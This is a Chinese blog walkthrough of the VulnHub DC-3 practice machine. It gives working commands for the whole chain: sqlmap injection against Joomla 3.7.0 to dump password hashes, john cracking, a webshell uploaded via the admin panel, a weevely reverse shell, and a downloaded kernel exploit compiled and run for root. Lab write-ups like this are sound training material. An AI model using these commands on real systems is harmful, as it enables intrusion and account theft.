vulnhub-DC-3靶机实战

 

下载地址

https://www.vulnhub.com/entry/dc-3,312/

 

 

实战步骤

首先我们打开靶机

vulnhub-DC-3靶机实战

用nmap探测主机

vulnhub-DC-3靶机实战

应该是152,探测一下端口

vulnhub-DC-3靶机实战

只开了个80,访问看看

vulnhub-DC-3靶机实战

是一个joomla的cms,我们需要确定cms的版本,然后看看有没有能利用的漏洞。我们用如下命令:

joomscan --url http://192.168.220.136

vulnhub-DC-3靶机实战

确定版本,joomla3.7.0,用searchsploit工具查找Joomla 3.7.0 版本存在的漏洞

searchsploit Joomla 3.7.0

vulnhub-DC-3靶机实战

发现一个SQL注入的漏洞

将sql注入漏洞相关介绍文档保存到本地,并查看相关注入方法

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt sql.txt

cat sql.txt

使用注入方法:

vulnhub-DC-3靶机实战

vulnhub-DC-3靶机实战

看一下我们现在用的joomladb

sqlmap -u "http://192.168.207.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

vulnhub-DC-3靶机实战

再看一下users那个表

sqlmap -u "http://192.168.207.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

vulnhub-DC-3靶机实战

值得注意的是name和password

sqlmap -u "http://192.168.207.152/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

vulnhub-DC-3靶机实战

得到用户名和加密的密码。将密文保存在一个文件中

vim 111

使用john爆破hash值

vulnhub-DC-3靶机实战

得到密码snoopy

我们需要进入后台,查找得知administrator是joomla默认的后台地址,我们尝试访问

vulnhub-DC-3靶机实战

进来了,哈哈,用刚才获取的账户密码登陆

vulnhub-DC-3靶机实战

进入后台,翻一翻有没有能上传文件的地方

vulnhub-DC-3靶机实战

这里有个New File,尝试搞个一句话

vulnhub-DC-3靶机实战

用蚁剑连接

vulnhub-DC-3靶机实战

vulnhub-DC-3靶机实战

成功连上

接下来用weevely反弹个shell出来

vulnhub-DC-3靶机实战

把shell.php上传到主机上

vulnhub-DC-3靶机实战

用kali连接

vulnhub-DC-3靶机实战拿到shell,可很明显我们要的东西应该在root文件夹下,要进行提权处理,搜索本机信息

查看内核版本

vulnhub-DC-3靶机实战

ubantu 16.04,去看看有什么提取方法。使用searchsploit

vulnhub-DC-3靶机实战

 

vulnhub-DC-3靶机实战

这个可以用来提权,尝试使用

vulnhub-DC-3靶机实战

vulnhub-DC-3靶机实战

去下载,解压之后上传到目标主机(需要*)

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

vulnhub-DC-3靶机实战

最后的文件,上传过去

vulnhub-DC-3靶机实战

进入到tmp文件夹依次执行

unzip 39772.zip 

cd 39772

tar -xvf exploit.tar 

cd ebpf_mapfd_doubleput_exploit

./compile.sh 

./doubleput 

等待一会,提权成功,游戏结束

vulnhub-DC-3靶机实战

 

 

总结

看一下整体思路:

1、确定cms版本

2、针对版本找目录

3、找上传点,上传一句话,蚁剑连接

4、用weevely反弹个shell出来

5、确定内核版本,找对应漏洞

6、提权,over

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

上一篇:字典树Java实现


下一篇:翻译:《实用的Python编程》06_02_Customizing_iteration